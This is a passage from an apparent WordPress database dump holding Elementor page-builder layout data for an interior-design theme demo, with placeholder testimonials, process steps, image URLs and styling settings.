due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3329,4780,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3330,4780,'_elementor_pro_version','3.8.1'),(3331,4780,'_elementor_css','a:6:{s:4:\"time\";i:1685012020;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3332,4781,'_wp_page_template','elementor_header_footer'),(3333,4781,'_elementor_edit_mode','builder'),(3334,4781,'_elementor_template_type','wp-page'),(3335,4781,'_elementor_version','3.8.1'),(3336,4781,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"